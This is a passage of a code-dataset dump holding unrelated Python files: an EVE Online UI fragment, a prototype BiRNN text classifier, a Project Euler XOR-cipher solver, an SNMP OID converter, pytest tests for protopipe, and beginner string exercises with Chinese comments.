self.GetSearchStr()\n self.SetHint()\n if len(self.searchStr) < 1:\n self.SetHint(localization.GetByLabel('UI/Shared/PleaseTypeSomething'))\n return\n result = sm.RemoteSvc('lookupSvc').LookupEvePlayerCharacters(self.searchStr, 0)\n if result is None or not len(result):\n self.SetHint(localization.GetByLabel('EVE/UI/Wallet/WalletWindow/SearchNoResults'))\n return\n cfg.eveowners.Prime([ each.characterID for each in result ])\n for each in result:\n owner = cfg.eveowners.Get(each.characterID)\n scrolllist.append(listentry.Get('Item', {'label': owner.name,'typeID': owner.typeID,'itemID': each.characterID,'OnClick': self.EnableInviteButton,'OnDblClick': self.InviteToCorp}))\n\n finally:\n self.scroll.Load(fixedEntryHeight=18, contentList=scrolllist, noContentHint=localization.GetByLabel('UI/Wallet/WalletWindow/SearchNoResults'))\n self.HideLoad()\n\n return\n\n def EnableInviteButton(self, *args):\n if self.GetSelected:\n self.inviteButton.Enable()\n\n def GetSearchStr(self):\n return self.nameInput.GetValue().strip()\n\n def SetHint(self, hintstr=None):\n if self.scroll:\n self.scroll.ShowHint(hintstr)\n\n def InviteToCorp(self, *args):\n sel = self.GetSelected()\n if sel:\n charID = sel[0].itemID\n sm.StartService('corp').InviteToJoinCorp(charID)\n self.CloseByUser()\n\n def GetSelected(self):\n sel = self.scroll.GetSelected()\n return sel\n\n def OnCancel(self, *args):\n self.CloseByUser()","sub_path":"client/eve/client/script/ui/shared/neocom/corporation/corp_ui_applications.py","file_name":"corp_ui_applications.py","file_ext":"py","file_size_in_byte":46185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"223260634","text":"\"\"\"Vanilla recurrent network model for sequences tagging.\"\"\"\nimport torch\nimport torch.nn as nn\nfrom src.models.tagger_base import TaggerBase\nfrom src.layers.layer_word_embeddings import LayerWordEmbeddings\nfrom src.layers.layer_bilstm import LayerBiLSTM\nfrom src.layers.layer_proto import LayerProto\nfrom src.layers.layer_pooler import LayerPooler\nfrom src.classes.utils import *\nimport numpy as np\nimport math\nimport time\nfrom sklearn.cluster import KMeans\nfrom anchor.anchor.utils import perturb_sentence\n\n\nclass TaggerProtoBiRNN(TaggerBase):\n \"\"\"TaggerBiRNN is a Vanilla recurrent network model for sequences tagging.\"\"\"\n def __init__(self, word_seq_indexer, tag_seq_indexer, class_num, batch_size=1, rnn_hidden_dim=100,\n freeze_word_embeddings=False, dropout_ratio=0.5, rnn_type='GRU', gpu=-1,\n num_prototypes_per_class=6, proto_dim = None, pretrained_path = None, max_pool_protos = False,\n pooling_type = 'attention', similarity_epsilon = 1e-4, hadamard_importance = False,\n similarity_function_name = 'log_inv_distance'):\n super(TaggerProtoBiRNN, self).__init__(word_seq_indexer, tag_seq_indexer, gpu, batch_size)\n self.tag_seq_indexer = tag_seq_indexer\n self.class_num = class_num\n self.rnn_hidden_dim = rnn_hidden_dim\n self.freeze_embeddings = freeze_word_embeddings\n self.dropout_ratio = dropout_ratio\n self.rnn_type = rnn_type\n self.gpu = gpu \n self.dropout = torch.nn.Dropout(p=dropout_ratio)\n self.num_prototypes_per_class = num_prototypes_per_class\n self.num_prototypes = class_num * num_prototypes_per_class\n self.proto_dim = proto_dim\n self.max_pool = max_pool_protos\n self.hadamard_importance = hadamard_importance\n\n # parameters\n self.prototypes_shape = (self.num_prototypes, self.proto_dim, 1) # the last dimension is 1 since the prototype vectors are used as a conv1d filter weight\n self.prototypes = nn.Parameter(torch.rand(self.prototypes_shape))\n\n # layers\n self.word_embeddings_layer = LayerWordEmbeddings(word_seq_indexer, gpu, freeze_word_embeddings) \n\n self.birnn_layer = LayerBiLSTM(input_dim=self.word_embeddings_layer.output_dim,\n hidden_dim=rnn_hidden_dim,\n gpu=gpu)\n self.pooler = LayerPooler(input_dim = self.birnn_layer.output_dim, gpu=gpu, pooling_type = pooling_type)\n \n self.dim_red = nn.Sequential(\n nn.Linear(in_features=self.pooler.output_dim, out_features=proto_dim),\n nn.Sigmoid()\n ) \n \n self.proto_layer = LayerProto(input_dim=self.proto_dim, prototypes=self.prototypes, num_classes = class_num,\n num_prototypes_per_class = num_prototypes_per_class, gpu=gpu, max_pool = max_pool_protos, \n similarity_epsilon = similarity_epsilon, hadamard_importance = hadamard_importance,\n similarity_function_name = similarity_function_name)\n \n self.lin_layer = nn.Linear(in_features=self.proto_layer.output_dim, out_features=class_num, bias = False)\n \n self.log_softmax_layer = nn.LogSoftmax(dim=1)\n if gpu >= 0:\n self.cuda(device=self.gpu)\n self.nll_loss = nn.NLLLoss() \n\n # init weights and set grad reqs\n self._initialize_weights()\n self._set_grad_reqs()\n \n\n def forward(self, word_sequences):\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n z_out = self.lin_layer(proto_output_h) # shape: batch_size x class_num \n y = self.log_softmax_layer(z_out) # shape: batch_size x class_num\n return y\n\n def get_logprobs_and_distances(self, word_sequences):\n '''distances needed for the loss, but .forward used throughout this codebase. so this function appears in main.py'''\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n z_out = self.lin_layer(proto_output_h) # shape: batch_size x class_num \n y = self.log_softmax_layer(z_out) # shape: batch_size x class_num \n return y, distances\n\n def get_logits(self, word_sequences):\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n z_out = self.lin_layer(proto_output_h) # shape: batch_size x class_num \n return z_out\n\n def push_forward(self, word_sequences):\n '''used in push step'''\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n return latent_h, distances # latent shape: batch_size x proto_dim. distances shape: batch_size x num_prototypes\n\n def get_proto_output(self, word_sequences):\n '''used when gathering similarity scores, e.g. in self.explain_instance'''\n mask = self.get_mask_from_word_sequences(word_sequences)\n z_word_embed = self.word_embeddings_layer(word_sequences)\n z_word_embed_d = self.dropout(z_word_embed)\n rnn_output_h = self.birnn_layer(z_word_embed_d, mask) # shape: batch_size x max_seq_len x hidden_dim*2\n pooled_output_h = self.pooler(rnn_output_h, mask) # shape: batch_size x hidden_dim*2\n latent_h = self.dim_red(pooled_output_h) # shape: batch_size x proto_dim\n proto_output_h, distances = self.proto_layer(latent_h) # proto_output shape: batch_size x num_features\n return proto_output_h, distances\n\n def initialize_from_pretrained(self, pretrained_path):\n print(\"Initializing model weights from model at %s\" % pretrained_path)\n pretrained_model = torch.load(pretrained_path)\n state_dict = pretrained_model.state_dict()\n \n # delete classifier weights\n del state_dict['lin_layer.weight']\n del state_dict['lin_layer.bias']\n # delete dim reduction weights if they don't match pretrained model's dimensionality\n if state_dict['dim_red.0.weight'].shape != self.dim_red[0].weight.shape:\n print(\"Dimension reduction matrix from pretrained model does not match this model's in shape!\")\n del state_dict['dim_red.0.weight']\n del state_dict['dim_red.0.bias']\n \n self.load_state_dict(state_dict, strict = False)\n\n\n def get_lin_layer_l1(self):\n '''returns l1 penalty on off-prototype-class-connection weights in lin_layer'''\n if self.max_pool:\n identity = torch.eye(self.class_num).cuda()\n mask = 1 - identity\n masked_weight = self.lin_layer.weight * mask\n else:\n identity = torch.eye(self.class_num).cuda()\n repeated_identity = identity.unsqueeze(2).repeat(1,1,self.num_prototypes_per_class).\\\n view(self.class_num, -1)\n mask = 1 - repeated_identity\n masked_weight = self.lin_layer.weight * mask \n return masked_weight.norm(p=1) \n\n def get_sep_loss(self, distances, word_sequences, targets_tensor):\n ''' \n return the mean distance between each instance and its closest off-class prototype \n distances should be shape: batch_size x num_prototypes\n need to mask the on-class prototype distances\n\n don't penalize distances once they're at least 4\n '''\n\n # mask the on-class prototype distances (set to 1e9)\n batch_size = targets_tensor.shape[0]\n for i in range(batch_size):\n target = targets_tensor[i].item()\n onclass_prototype_idx = np.arange(target * self.num_prototypes_per_class, (target+1) * self.num_prototypes_per_class)\n mask = torch.ones(batch_size, self.num_prototypes)\n mask[i, onclass_prototype_idx] = 1e9\n mask = mask.cuda()\n distances = distances * mask\n\n closest_distances, _ = torch.min(distances, dim = 1)\n max_to_penalize = 4 * torch.ones_like(closest_distances)\n stacked_distances_and_caps = torch.stack((closest_distances,max_to_penalize),dim=0)\n capped_closest_distances, _ = torch.min(stacked_distances_and_caps,dim=0)\n neg_avg_closest_distance = -torch.mean(capped_closest_distances)\n return neg_avg_closest_distance\n \n\n def get_loss(self, args, word_sequences_train_batch, tag_sequences_train_batch):\n # defunct, loss now calculated in main.py\n outputs_tensor_train_batch_one_hot, distances = self.get_logprobs_and_distances(word_sequences_train_batch)\n targets_tensor_train_batch = self.tag_seq_indexer.items2tensor(tag_sequences_train_batch)\n cross_entropy = self.nll_loss(outputs_tensor_train_batch_one_hot, targets_tensor_train_batch)\n\n sep_loss = self.get_sep_loss(distances, word_sequences_train_batch, targets_tensor_train_batch)\n lin_layer_reg = self.get_lin_layer_l1()\n\n loss = cross_entropy + 1/10 * lin_layer_reg + 1/100 * sep_loss\n\n return loss\n\n\n def freeze_unfreeze_parameters(self, epoch, args):\n # linear layer\n set_to = (epoch >= args.unfreeze_lin_layer)\n self.lin_layer.weight.requires_grad = set_to # there is no lin_layer.bias\n\n if args.hadamard_importance:\n assert args.unfreeze_lin_layer > 999, \"Using hadamard weighting in proto_layer, should keep tagger.lin_layer frozen as an identity matrix (i.e. set to at least 999)\"\n \n # every other layer\n set_to = (epoch >= args.unfreeze_feature_extractor)\n self.word_embeddings_layer.requires_grad = set_to\n for m in self.birnn_layer.rnn.modules():\n if hasattr(m,'weight'):\n m.requires_grad = set_to\n if hasattr(m,'bias'):\n m.requires_grad = set_to\n for m in self.pooler.modules():\n if hasattr(m,'weight'):\n m.requires_grad = set_to\n if hasattr(m,'bias'):\n m.requires_grad = set_to \n for m in self.dim_red.modules():\n if hasattr(m,'weight'):\n m.requires_grad = set_to\n if hasattr(m,'bias'):\n m.requires_grad = set_to\n\n\n def _initialize_weights(self):\n \n def _initialize_random_projection(m):\n if type(m) == nn.Linear:\n torch.nn.init.normal_(m.weight, mean=0, std = 1 / (m.out_features ** 1/2) ) \n\n def _initialize_lin_layer(self): \n if self.max_pool:\n identity = torch.eye(self.class_num)\n self.lin_layer.weight.data.copy_(identity)\n else: \n identity = torch.eye(self.class_num)\n repeated_identity = identity.unsqueeze(2).repeat(1,1,self.num_prototypes_per_class).\\\n view(self.class_num, -1) \n self.lin_layer.weight.data.copy_(repeated_identity)\n\n _initialize_lin_layer(self) \n self.dim_red.apply(_initialize_random_projection) \n\n\n def _set_grad_reqs(self):\n self.word_embeddings_layer.requires_grad = False\n for m in self.modules(): \n if hasattr(m,'weight'):\n m.requires_grad = False\n if hasattr(m,'bias'):\n m.requires_grad = False\n self.prototypes.requires_grad = True\n\n\n def initialize_prototypes_empirical(self, word_sequences, tag_sequences, batch_size = 10):\n '''initialize prototypes for each class by k-means on that classes latent representations (class given by labels)'''\n print(\"Initializing prototypes empirically\")\n self.eval()\n class2vecs = dict()\n class_id_list = [i for i in range(0, self.class_num)] \n\n for i in class_id_list:\n class2vecs[i] = []\n \n # for each batch, get vecs and ids, add vecs to class2vecs based on ids\n batch_num = math.floor(len(word_sequences) / batch_size)\n if len(word_sequences) > 0 and len(word_sequences) < batch_size:\n batch_num = 1\n\n start_time = time.time()\n \n for n in range(batch_num):\n i = n*batch_size\n if n < batch_num - 1:\n j = (n + 1)*batch_size\n else:\n j = len(word_sequences)\n \n batch = word_sequences[i:j]\n targets = self.tag_seq_indexer.items2idx(tag_sequences[i:j])\n mask = self.get_mask_from_word_sequences(batch) \n latents, distances = self.push_forward(batch) # latents: batch_size x proto_dim\n for k in range(len(batch)): \n class_id = targets[k]\n latent_vec = latents[k, :].detach().cpu().numpy()\n class2vecs[class_id].append(latent_vec)\n\n print('gathering latent vecs took %.1f seconds' % (time.time() - start_time))\n\n # there are a variety of ways to move the data from kmeans.cluster_centers_ to self.prototypes, of course\n # but copying with splices directly to self.prototypes_[idx,:,:] was silently failing, so we preallocate and .copy_ all at once\n new_prototypes = torch.zeros(0, self.proto_dim, 1) \n for i in class_id_list:\n class_data = np.array(class2vecs[i])\n proto_idx = [idx for idx in range(self.num_prototypes_per_class*(i-1),\\\n self.num_prototypes_per_class*i)]\n kmeans = KMeans(n_clusters = self.num_prototypes_per_class)\n kmeans.fit(class_data)\n\n centers = torch.Tensor(kmeans.cluster_centers_).view(self.num_prototypes_per_class, self.proto_dim, 1)\n new_prototypes = torch.cat((new_prototypes, centers), 0) \n\n self.prototypes.data.copy_(new_prototypes)\n\n\n def explain_instance(self, word_sequence, saliency_type = 'directional', neighbors_obj = None, language_model = None, tokenizer = None,\n counterfactual_method = 'unk', decision_boundary = False):\n # word_sequence should be text with tokens separated by spaces or list of tokens\n self.eval()\n\n # adjust formatting for string inputs\n if type(word_sequence) is str:\n word_sequence = word_sequence.split()\n\n # local vars\n classes = self.tag_seq_indexer.idx2items([0,1])\n text = ' '.join(word_sequence)\n m = 10 # multiple for scaling the logits. easier to read values on the integer rather than decimal scale\n\n # original prediction and logits\n orig_logits = self.get_logits([word_sequence]).squeeze().detach().cpu()\n pred = np.argmax(orig_logits)\n predicted_tag = classes[pred]\n opposite_tag = classes[1-pred]\n \n # local vars\n prototype_dict = self.prototype_dict\n n_protos_per_class = self.num_prototypes_per_class\n max_activation = self.proto_layer.similarity_score(torch.zeros(1)).item()\n\n # proto output \n proto_output, distances = self.get_proto_output([word_sequence])\n proto_output = proto_output.detach().cpu().squeeze()\n distances = distances.detach().cpu().squeeze()\n prototype_id = np.argmin(distances).item()\n activated_prototype = prototype_dict[prototype_id]\n similarity_score = self.proto_layer.similarity_score(torch.min(distances)).item()\n\n # get signed evidence measure\n signed_evidence_str = '+%.2f' % (m*similarity_score) if activated_prototype.tag == 'pos' else '-%.2f' % (m*similarity_score)\n\n # proto and input salience \n orig_explanation = self.prototype_saliency_map(word_sequence, \n saliency_type = saliency_type, \n prototype_id = prototype_id, \n neighbors_obj = neighbors_obj,\n language_model = language_model,\n tokenizer = tokenizer,\n counterfactual_method = counterfactual_method)\n\n\n # if not going to look at a perturbation of the opposite predicted class, then go ahead and assemble the explanation\n explanation = \"Most activated prototype (label: %s) | evidence: %s \\n\" % (predicted_tag, signed_evidence_str) + \\\n activated_prototype.to_str() + '\\n----\\n' + \\\n \"Informative words in input:\\n\" + \\\n orig_explanation\n \n return explanation\n\n\n\n def prototype_saliency_map(self, word_sequence, prototype_id, saliency_type = 'directional', num_perturbations = 1000, neighbors_obj = None, \n counterfactual_method = 'unk', language_model = None, tokenizer = None):\n '''\n get feature importance scores for prototype model using word omission with counterfactual_method approach\n '''\n\n # prep tagger\n self.zero_grad()\n self.eval()\n \n # local variables\n n_protos_per_class = self.num_prototypes_per_class\n class_id = prototype_id // n_protos_per_class\n start = time.time()\n m = 10 # multiple for word importance values and logits. easier to read values on the integer scale than decimal.\n \n # should clean this up with arguments, since this is computed in .explain_instance. for now, recompute\n predicted_tag = self.predict_tags_from_words([word_sequence], constrain_to_classes = None, quiet = True)[0]\n\n # get valid_idx for words to sample in expected_word method\n if counterfactual_method == 'expected_word':\n all_vocab = [force_ascii(tokenizer._convert_id_to_token(i)) for i in range(tokenizer.vocab_size)]\n valid_vocab = [word for word in all_vocab if word in self.word_seq_indexer.item2idx_dict]\n valid_idx = np.argwhere([word in self.word_seq_indexer.item2idx_dict for word in all_vocab]).reshape(-1)\n\n # forward pass\n logits = self.get_logits([word_sequence])\n selected_logit = torch.max(logits) if class_id is None else logits[0,class_id] \n selected_logit = selected_logit.detach().cpu()\n\n # need class ids to possibly negate the importance values later\n neg_class_id = self.tag_seq_indexer.item2idx_dict['neg']\n pred_class_id = torch.argmax(logits.view(-1)).item()\n explain_class_id = pred_class_id if class_id is None else class_id\n\n # get avg. difference in selected_logit and the class logit obtained from perturbed inputs (perturbed at a specific word)\n logit_differences = np.zeros(len(word_sequence))\n\n for slot_id in range(len(word_sequence)):\n\n # if 'unk' or 'neighbors', fill the slot with either the vector or neighboring words in embedding space (according to counterfactual_method)\n if counterfactual_method != 'expected_word':\n counterfactual_sequences = replace_word(word_sequence, slot_id, neighbors_obj, \n tagger_word_dict = self.word_seq_indexer.item2idx_dict, method = counterfactual_method)\n counterfactual_logits = self.get_logits(counterfactual_sequences).detach().cpu()\n mean_logit = torch.mean(counterfactual_logits[:,explain_class_id])\n \n logit_differences[slot_id] = selected_logit - mean_logit\n\n # if 'expected_word', find the expected logit over p(x_i | x_{-i})\n elif counterfactual_method == 'expected_word':\n expected_logit = expected_score(word_sequence = word_sequence, \n mask_position = slot_id, \n class_id = explain_class_id, \n tagger = self, \n language_model = language_model, \n tokenizer = tokenizer, \n vocab = valid_vocab, \n valid_idx = valid_idx)\n logit_differences[slot_id] = selected_logit - expected_logit\n\n # set importance metric\n importance_metric = logit_differences\n\n # quick fix so that saliency maps are consistently directional between classes. positive values always positive sentiment, negative numbers always negative sentiment\n neg_class_id = self.tag_seq_indexer.item2idx_dict['neg']\n explain_class_id = self.tag_seq_indexer.item2idx_dict[predicted_tag] if class_id is None else class_id\n if explain_class_id == neg_class_id and (saliency_type == 'directional' or saliency_type == 'counterfactual'):\n importance_metric = -importance_metric \n\n # scale by 10 for readability\n importance_metric = m * importance_metric \n \n # get highlighted words\n importance_str = saliency_list_values(word_sequence, importance_metric, saliency_type, print_flat = False)\n\n # print(\"Prototype explanation took %.2f seconds\" % (time.time() - start))\n\n return importance_str\n\n","sub_path":"text/src/models/tagger_proto_birnn.py","file_name":"tagger_proto_birnn.py","file_ext":"py","file_size_in_byte":23242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"550020853","text":"# Project Euler - 059\nimport timeit as t\nimport string as st\n\n# Simple cryptography problem. We are given important information to solve it:\n# - The key is a three letter word, so the keyspace is 26**3, which isn't very large.\n# - It contains common English words, so it yelds to frequency analysis.\n# I guessed that the code would preserve punctuation, so I tried every key\n# and counted the number of ASCII spaces it originated. The ASCII code for space\n# is 32, so I tracked that. The maximum number of spaces would point to the\n# correct key. The text size isn't a multiple of 3, so I had to keep that in mind.\n# Since I knew that the key was 3 letters, I could have done a column analysis\n# and tested it as 3 monoalphabetic ciphers. But since the keyspace was so small\n# it was fast enough to just try every key.\n# The resulting passage is from the Gospel of John.\n\n\ndef parse_file(filename):\n with open(filename, 'r') as file:\n return list(map(int, file.readline().strip().split(\",\")))\n\ndef solve_cipher():\n data = parse_file(\"P059_cipher.txt\")\n source = st.ascii_lowercase\n keys = [[ord(a), ord(b), ord(c)] *\n 401 for a in source for b in source for c in source]\n space_count = 0\n best_key = [0, 0, 0]\n ascii_value = 0\n for k in keys:\n candidate = [a ^ b for (a, b) in zip(data, k[:1201])]\n if candidate.count(32) > space_count:\n space_count = candidate.count(32)\n best_key = k[:3]\n ascii_value = sum(candidate)\n return (''.join(chr(x) for x in best_key), ascii_value)\n\n# No-args functions for timeit module.\ndef f():\n return solve_cipher()\n\n# Benchmarks\nprint(\"Timing 1 run.\")\nprint(\"Generate and test:\", t.timeit(f, number=1), \"seconds\")\nprint(\"Result:\", f())\n","sub_path":"001 - 100/P059.py","file_name":"P059.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"377504780","text":"import re\nimport os\nimport itertools\nimport subprocess\n\ndef ipConvert(text):\n if type(text) is str:\n text=text.splitlines()\n new=[]\n for line in text:\n line=line.strip().strip('\"-')\n if not line.isdecimal() :\n continue\n q = []\n for i in range (0, 4):\n bit = (int(line) >> (3-i)*8) & 0xFF\n q.append(str(bit))\n new.append(\".\".join(q))\n return new\n\ndef readcontent():\n with open (filepath) as f: \n return f.readlines()\n\ndef saveData(res):\n with open (newfile,mode='w',encoding='utf-8') as j:\n j.write(';'.join(res))\n\ndef NBoidConvert(text):\n if type(text) is str:\n text=text.splitlines()\n res,key=[],[]\n for line in text:\n \n if not (line.startswith('1.3.6.1.') or line.startswith('.1.3.6.1')):\n continue\n sid=line.split(' =')[0]\n if sid in key:\n print ('Duplicated OID exist:\\t',sid)\n break\n else:\n key.append(sid)\n if line.startswith('1.3.6'):\n line=line.replace('1.3.6','.1.3.6')\n line=line.replace(':\\t',': ')\n line=line.replace(' : ',' = ')\n if line.find(r'OCTETS:')>-1:\n res.append(line.replace('OCTETS:','STRING:'))\n elif line.find(r'TIMETICKS:')>-1:\n res.append(re.sub('TIMETICKS\\: .*','1',line))\n elif line.find(r'COUNTER:')>-1:\n res.append(line.replace('COUNTER:','COUNTER32:'))\n elif line.find(r'SYNTAXOID:') >-1:\n res.append(line.replace('SYNTAXOID:','OID:'))\n elif line.find(r'COUNTER64: 0x') >-1:\n start,value=line.split(r'COUNTER64: 0x')\n res.append(start+r'COUNTER64: '+str(int(value,16))+os.linesep)\n elif line.find(r'Hex-String: ')>-1:\n start,value=line.split('Hex-String: ')\n res.append(start+'Hex-String: '+''.join([' '+m if n!=0 and n%2==0 else m for n,m in enumerate(value)]))\n else:\n res.append(line)\n return sorted(res,key=natural_key)\n\ndef syToNum(data):\n res=[]\n for line in data:\n tit,flag,value=line.partition(' = ')\n tit=subprocess.check_output([r'D:\\Program Files\\usr\\bin\\snmptranslate.exe','-Ofn',tit],universal_newlines=True).strip()\n print (tit+flag+value.strip())\n res.append(tit+flag+value.strip())\n\ndef natural_key(s):\n return tuple(\n int(''.join(chars)) if isdigit else ''.join(chars)\n for isdigit, chars in itertools.groupby(s, str.isdigit)\n )\n\ndef attCvt(data):\n for line in data.splitlines():\n #if line.find(r'Timeticks:')>-1:\n # line=re.sub('Timeticks\\: .*','1',line)\n #if line.find('OID:') >-1 and line.find('::')>-1:\n # value=subprocess.check_output([r'D:\\Program Files\\usr\\bin\\snmptranslate.exe','-Ofn',line[line.find('OID:')+5:]],universal_newlines=True).strip()\n # line=line[:line.find('OID: ')]+'OID: '+value\n if line.find('INTEGER: ')>-1:\n value=re.search('(\\d+)',line[line.find('INTEGER: ')+9:])\n line=line[:line.find('INTEGER: ')]+'INTEGER: '+value.group(1)\n print (line)\n\nrootpath=r'd:/'\nfilename=r'nexus.snmpwalk'\nglobal newfile,filepath\nnewfile=rootpath+filename+'_convert'\nfilepath=rootpath+filename\ndef ConvrtOIDsInFile():\n saveData(NBoidConvert(readcontent()))\n\ndef int2IPInFIle():\n saveData(ipConvert(readcontent()))\n\ndef CvtsyToNum():\n saveData(syToNum(readcontent()))\n#ConvrtOIDsInFile()\n#int2IPInFIle()\n#CvtsyToNum()\n\nif __name__ == '__main__':\n data='''\n sdfsf\n '''\n # print(data)\n # print(data)\n attCvt(data)\n if os.path.exists(r\"C:\\Program Files (x86)\\SNMP Simulator\\Data\\nb.snmpwalk\"):\n ff=open(r\"C:\\Program Files (x86)\\SNMP Simulator\\Data\\\\nb.snmpwalk\",\"w\")\n for datas in NBoidConvert(data):\n ff.write(datas+\"\\n\")\n ff.close()","sub_path":"code/Original.py","file_name":"Original.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"87015908","text":"\"\"\"Test the data training script in a variety of conditions.\"\"\"\nfrom os import path, system\nfrom pkg_resources import resource_filename\nfrom protopipe.scripts import data_training\nfrom ctapipe.utils import get_dataset_path\n\n# TEST FILES\n# 110 events, 98 telescopes at Paranal.\n# Instruments tested: LST_LST_LSTCam, MST_MST_FlashCam, SST_ASTRI_ASTRICam\nGAMMA_TEST_LARGE = get_dataset_path(\"gamma_test_large.simtel.gz\")\n# WARNING: absolutely not sufficient!\n# This is just the only file easily usable without external resources.\n# Later on, we will need a sub-simtel file from each of the\n# MC productions expected to be analyzed with protopipe.\n\n# configuration files\nana_config = resource_filename(\"protopipe\", \"aux/example_config_files/analysis.yaml\")\n\n\ndef test_dataTraining_noImages():\n \"\"\"Very bare test to see if the script reaches the end correctly.\n\n WARNING: some of the cuts in the example config file are not optimized for\n cameras other than LSTCam and NectarCam.\n In any case, it is expected that in absence of fatal bugs, the script\n ends successfully.\n \"\"\"\n exit_status = system(\n f\"python {data_training.__file__}\\\n --config_file {ana_config}\\\n -o test_training_noImages.h5\\\n -m 10\\\n -i {path.dirname(GAMMA_TEST_LARGE)}\\\n -f {path.basename(GAMMA_TEST_LARGE)}\"\n )\n assert exit_status == 0\n\n\ndef test_dataTraining_withImages():\n \"\"\"Very bare test to see if the script reaches the end correctly.\n\n WARNING: some of the cuts in the example config file are not optimized for\n cameras other than LSTCam and NectarCam.\n In any case, it is expected that in absence of fatal bugs, the script\n ends successfully.\n \"\"\"\n exit_status = system(\n f\"python {data_training.__file__}\\\n --config_file {ana_config}\\\n -o test_training_withImages.h5\\\n -m 10\\\n --save_images\\\n -i {path.dirname(GAMMA_TEST_LARGE)}\\\n -f {path.basename(GAMMA_TEST_LARGE)}\"\n )\n assert exit_status == 0\n","sub_path":"protopipe/scripts/tests/test_dataTraining.py","file_name":"test_dataTraining.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"131272604","text":"# 全是字符串的\n# 用于训练考察基本的编程能力\n#\n# 用到的知识主要是\n# 0, 用下标引用字符串\n# 1, 字符串切片\n# 2, 循环\n# 3, 选择 (也就是 if)\n#\n#\n# 1,\n# 实现一个函数\n# 返回一个「删除了字符串开始的所有空格」的字符串\n# def strip_left(s)\n#\ndef strip_left(s):\n offset = -1\n for i in range(len(s)):\n if s[i] != ' ':\n offset = i\n break\n # print(offset)\n if offset == -1:\n return ''\n else:\n return s[offset:]\n\n# string = ' hello '\n# string = ' '\n# r = strip_left(string)\n# print(len(r), r)\n# 例子\n# print(strip_left(' hello')\n# # 返回 'hello'\n# 提示,用循环查找到第一个不为空格的字符的下标然后切片返回\n#\n#\n# 2,\n# 实现一个函数\n# 返回一个「删除了字符串末尾的所有空格」的字符串\n# def strip_right(s)\n#\ndef strip_right(s):\n end = len(s)\n # 开始 结束 步长\n for i in range(len(s), 0, -1):\n index = i - 1\n if s[index] != ' ':\n end = index\n break\n if end == len(s):\n return ''\n else:\n return s[:end+1]\n\n# for i in range(5-1, -1, -1):\n# print('i', i)\n# string = ' hello '\n# string = ' '\n# r = strip_right(string)\n# print(len(r), r)\n\n\n\n\n#\n# 3,\n# 实现一个函数\n# 返回一个「删除了字符串首尾的所有空格」的字符串\n# def strip(s)\n#\ndef strip(s):\n s1 = strip_left(s)\n s2 = strip_right(s1)\n return s2\n\n# string = ' hello '\n# # string = ' '\n# r = strip(string)\n# print('strip', len(r), r)\n#\n# 4,\n# 实现一个函数, 接受一个参数 s\n# 检查这个参数是否只包含空格\n# 返回 True / False\n# def is_space(s)\n#\ndef is_space(s):\n for i in s:\n if i != ' ':\n return False\n return True\n#\n# 5,\n# 实现一个函数, 接受一个参数 s\n# 检查这个参数是否只包含 空白符号\n# 空白符号包括三种 ' ' '\\n' '\\t'\n# 返回 True / False\n# def is_white(s)\n#\ndef is_white(s):\n whites = [' ', '\\n', '\\t']\n for i in s:\n if i not in whites:\n return False\n return True\n\n# for i in 'hello':\n# print(i)\n#\n# 6,\n# 实现一个函数, 接受 2 个参数 s1 s2\n# 检查 s1 是否以 s2 开头\n# 返回 True / False\n# def starts_with(s1, s2)\n#\ndef starts_with(s1, s2):\n # 别的语言一般这么做\n # for i in range(len(s2)):\n # if s1[i] != s2[i]:\n # return False\n # return True\n # # Python 可以这么做\n s1head = s1[:len(s2)]\n # print('s1 head', s1head)\n return s1head == s2\n\nprint(starts_with('hello', 'he'))\n# ends_with\n# if filename.ends_with('.avi'):\n# 播放(filename)\n#\n# os.name\n# Windows 98\n# Windows 2000\n# Windows xp\n# Windows 7\n# Windows 8\n# Windows 9\n# Windows 10\n# if os.name.starts_with('Windows 9'):\n # it's win98\n\n\n# 例子\n# print(starts_with('hello', 'he'))\n# # True\n#\n#\n# 7,\n# 实现一个函数, 接受 3 个参数 s old new 都是字符串\n# 返回一个「将 s 中的 old 字符串替换为 new 字符串」的字符串\n# 假设 old 存在并且只出现一次\n# def 